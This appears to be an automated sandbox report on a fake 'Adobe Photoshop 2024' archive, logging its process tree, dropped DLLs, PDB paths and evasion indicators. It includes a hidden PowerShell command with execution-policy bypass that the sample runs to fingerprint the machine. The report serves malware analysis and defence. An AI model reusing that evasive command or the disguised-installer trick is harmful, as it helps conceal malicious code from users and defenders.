Source: Ninject.dll.2.dr, ExtensionsForAssembly.csSuspicious method names: .ExtensionsForAssembly.HasNinjectModules
Source: Ninject.dll.2.dr, ExtensionsForAssembly.csSuspicious method names: .ExtensionsForAssembly.GetNinjectModules
Source: Ninject.dll.2.dr, BindingConfigurationBuilder.csSuspicious method names: .BindingConfigurationBuilder.WhenInjectedExactlyInto
Source: Ninject.dll.2.dr, BindingConfigurationBuilder.csSuspicious method names: .BindingConfigurationBuilder.WhenInjectedInto
Source: Ninject.dll.2.dr, PropertyInjectionStrategy.csSuspicious method names: .PropertyInjectionStrategy.GetValue
Source: Ninject.dll.2.dr, PropertyInjectionStrategy.csSuspicious method names: .PropertyInjectionStrategy.Activate
Source: Ninject.dll.2.dr, PropertyInjectionStrategy.csSuspicious method names: .PropertyInjectionStrategy.AssignPropertyOverrides
Source: Ninject.dll.2.dr, ReflectionInjectorFactory.csSuspicious method names: .ReflectionInjectorFactory.Create
Source: Ninject.dll.2.dr, PropertyInjectionDirective.csSuspicious method names: .PropertyInjectionDirective.CreateTarget
Source: Ninject.dll.2.dr, MethodInjectionDirectiveBase.csSuspicious method names: .MethodInjectionDirectiveBase.CreateTargetsFromParameters
Source: Ninject.dll.2.dr, IResolutionRoot.csSuspicious method names: ..Inject
Source: Ninject.dll.2.dr, MethodInjectionStrategy.csSuspicious method names: .MethodInjectionStrategy.Activate
Source: Ninject.dll.2.dr, StandardProvider.csSuspicious method names: .StandardProvider.DetermineConstructorInjectionDirective
Source: Ninject.dll.2.dr, KernelBase.csSuspicious method names: .KernelBase.Inject
Source: Ninject.dll.2.dr, StandardInjectionHeuristic.csSuspicious method names: .StandardInjectionHeuristic.ShouldInject
Source: Ninject.dll.2.dr, DynamicMethodInjectorFactory.csSuspicious method names: .DynamicMethodInjectorFactory.EmitUnboxOrCast
Source: Ninject.dll.2.dr, DynamicMethodInjectorFactory.csSuspicious method names: .DynamicMethodInjectorFactory.EmitMethodCall
Source: Ninject.dll.2.dr, DynamicMethodInjectorFactory.csSuspicious method names: .DynamicMethodInjectorFactory.EmitLoadMethodArguments
Source: Ninject.dll.2.dr, DynamicMethodInjectorFactory.csSuspicious method names: .DynamicMethodInjectorFactory.GetAnonymousMethodName
Source: Ninject.dll.2.dr, DynamicMethodInjectorFactory.csSuspicious method names: .DynamicMethodInjectorFactory.Create
Source: Ninject.dll.2.dr, NinjectSettings.csSuspicious method names: .NinjectSettings.Get
Source: Ninject.dll.2.dr, NinjectSettings.csSuspicious method names: .NinjectSettings.Set
Source: Ninject.dll.2.dr, IConstructorArgumentSyntax.csSuspicious method names: ..Inject
Source: Ninject.dll.2.dr, ExceptionFormatter.csSuspicious method names: .ExceptionFormatter.CouldNotResolvePropertyForValueInjection
Source: classification engineClassification label: mal52.evad.winZIP@12/29@0/0
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeFile created: C:\Users\user\Desktop\logsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6352:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3712:120:WilError_03
Source: C:\Windows\SysWOW64\unarchiver.exeFile created: C:\Users\user\AppData\Local\Temp\unarchiver.logJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Adobe_Photoshop_2024.exe, 00000006.00000002.2106017347.0000000005662000.00000002.00000001.01000000.0000000B.sdmp, SShop.Data.dll.2.drBinary or memory string: select count(*) from CashExpense where created >= @from and created <= @to;select count(*) from PubDesk KDataAccess.DeleteOrphanedPubDeskBills
Source: Adobe_Photoshop_2024.exe, 00000006.00000002.2106017347.0000000005662000.00000002.00000001.01000000.0000000B.sdmp, SShop.Data.dll.2.drBinary or memory string: update Sequence set Seq = @seq, Changed = getdate() where Code = @codeqGetNextSequence - notError: MaxValue reached; Update to:
Source: PSLibs.exeString found in binary or memory: Check charset encoding and -scs switch.Cannot find listfile*BLEDARVUANAXAIXIWOMPYTBDBA-HELPH?asut0-SCRCSSCSSWSLTSCCSCSSLPADSEMLAOSOSISFXPQRXYZW0123cannot find archivethere is no such archivestdout mode and email mode cannot be combinedCannot use absolute pathnames for this commanddata errorIncorrect mapping dataMapViewOfFile errorCan not open mappingIncorrect volume size4
Source: unknownProcess created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\Adobe_Photoshop_2024 (1).zip"
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg" "C:\Users\user\Desktop\Adobe_Photoshop_2024 (1).zip"
Source: C:\Windows\SysWOW64\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -Command "(Get-CimInstance -ClassName Win32_VideoController).Caption;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg" "C:\Users\user\Desktop\Adobe_Photoshop_2024 (1).zip"Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -Command "(Get-CimInstance -ClassName Win32_VideoController).Caption;"Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\7za.exeSection loaded: 7z.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: Adobe_Photoshop_2024 (1).zipStatic file information: File size 23182330 > 1048576
Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
Source: Binary string: D:\Red Zion Simple Shop\svn\SimpleShop\trunk\SShop.Data\obj\Release\SShop.Data.pdb source: SShop.Data.dll
Source: Binary string: AdobeOwl.pdb source: AdobeOwl.dll
Source: Binary string: D:\Red Zion Simple Shop\svn\SimpleShop\trunk\SShop.Business\obj\Release\SShop.Business.pdb[ source: Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dll
Source: Binary string: E:\workspace\RT_Win_8_0\Mainline\public\binary\Win\x64\Release\AdobePIP.pdb source: AdobePIP.dll
Source: Binary string: D:\Red Zion Simple Shop\svn\SimpleShop\trunk\SShop.Business\obj\Release\SShop.Business.pdb source: Adobe_Photoshop_2024.exe, Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dll
Source: Binary string: G:\Dev\NPoco\src\NPoco\obj\release\net461\NPoco.pdb source: Adobe_Photoshop_2024.exe, Adobe_Photoshop_2024.exe, 00000006.00000002.2107871205.0000000007402000.00000002.00000001.01000000.00000011.sdmp, NPoco.dll
Source: Binary string: \??\C:\Windows\symbols\dll\SShop.Data.pdbo source: Adobe_Photoshop_2024.exe, 00000006.00000002.2101418445.0000000000F23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\bamboo-agent-home\xml-data\build-dir\CS-X64REL12-BREL\x64\Release\SDK5App.pdb source: PhotoshopCloud.dll
Source: Binary string: E:\PS\PS20\Win64_Release\20190227.r.76\photoshop\main\photoshop\Targets\x64\Release\PSViews.pdb source: PhotoshopViews.dll
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Ninject.PDB source: Adobe_Photoshop_2024.exe, 00000006.00000002.2101418445.0000000000F55000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\workspace\RT_Win_8_0\Mainline\public\binary\Win\x64\Release\AdobePIP.pdb<< source: AdobePIP.dll
Source: Binary string: C:\projects\ninject\src\Ninject\obj\Release\net45\Ninject.pdbR6 source: Ninject.dll
Source: Binary string: \??\C:\Windows\symbols\dll\SShop.Data.pdbr source: Adobe_Photoshop_2024.exe, 00000006.00000002.2101418445.0000000000F23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\projects\ninject\src\Ninject\obj\Release\net45\Ninject.pdb source: Ninject.dll
Source: Binary string: D:\Red Zion Simple Shop\svn\SimpleShop\trunk\Contracts\obj\Release\SShop.Contracts.pdb source: SShop.Contracts.dll
Source: Binary string: \??\C:\Windows\symbols\exe\InvoiceOfflineImport.pdb source: Adobe_Photoshop_2024.exe, 00000006.00000002.2101418445.0000000000F23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\PS\PS20\Win64_Release\20190227.r.76\photoshop\main\photoshop\Targets\x64\Release\Photoshop.pdb source: Photoshop.dll
Source: Binary string: G:\Dev\NPoco\src\NPoco\obj\release\net461\NPoco.pdbSHA256 source: Adobe_Photoshop_2024.exe, 00000006.00000002.2107871205.0000000007402000.00000002.00000001.01000000.00000011.sdmp, NPoco.dll
Source: Binary string: D:\Red Zion Simple Shop\svn\SimpleShop\trunk\InvoiceOfflineImport\obj\x86\Release\InvoiceOfflineImport.pdb6 source: Adobe_Photoshop_2024.exe, 00000006.00000002.2101418445.0000000000F23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\Red Zion Simple Shop\svn\SimpleShop\trunk\InvoiceOfflineImport\obj\x86\Release\InvoiceOfflineImport.pdb source: Adobe_Photoshop_2024.exe

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -Command "(Get-CimInstance -ClassName Win32_VideoController).Caption;"
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -Command "(Get-CimInstance -ClassName Win32_VideoController).Caption;"Jump to behavior
Source: SShop.Business.dll.2.drStatic PE information: 0xCBFEAD87 [Tue Jun 14 20:50:15 2078 UTC]
Source: PSLibs.exe.2.drStatic PE information: section name: .sxdata
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_01335E7D push cs; iretd 6_2_01335EDA
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_01335CDF push cs; iretd 6_2_01335EDA
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_0561BD0D push esp; retf 6_2_0561BDFF
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_056652C3 pushfd ; retf 6_2_056652C4
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_05665148 pushfd ; retf 6_2_05665149
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_07403368 push es; ret 6_2_0740336B
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_00E7C7D7 push ebx; ret 6_2_00E7C7DA
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_00E7C86F push 00000039h; ret 6_2_00E7C874
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_00E74ADA pushad ; iretd 6_2_00E74AD1
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_00E74AB2 push esp; iretd 6_2_00E74AD9
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_00E7ACE2 push 0000005Ch; ret 6_2_00E7AD5E
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_00E7ADFD push edi; ret 6_2_00E7AE43
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_00E7AE6A push edi; ret 6_2_00E7AE6B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04E7B485 push ecx; ret 8_2_04E7B43B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04E75420 push eax; mov dword ptr [esp], edx8_2_04E75434
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04E7B5E7 push eax; ret 8_2_04E7B5EB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04E715CD push ebx; ret 8_2_04E715DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04E7E7D8 push ds; ret 8_2_04E7E7EB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04E7E738 push ds; ret 8_2_04E7E7EB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04E7B3DD push ecx; ret 8_2_04E7B43B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04E7B3A7 push ecx; ret 8_2_04E7B43B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04E7B3BD push edx; ret 8_2_04E7B3DB
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\AdobePIP.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\PhotoshopViews.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\AdobeOwl.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Photoshop.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\PhotoshopCloud.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\PSLibs.exeJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\NPoco.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Base.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Business.XmlSerializers.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Contracts.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Business.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Data.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.DiagramNet.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Ninject.dllJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
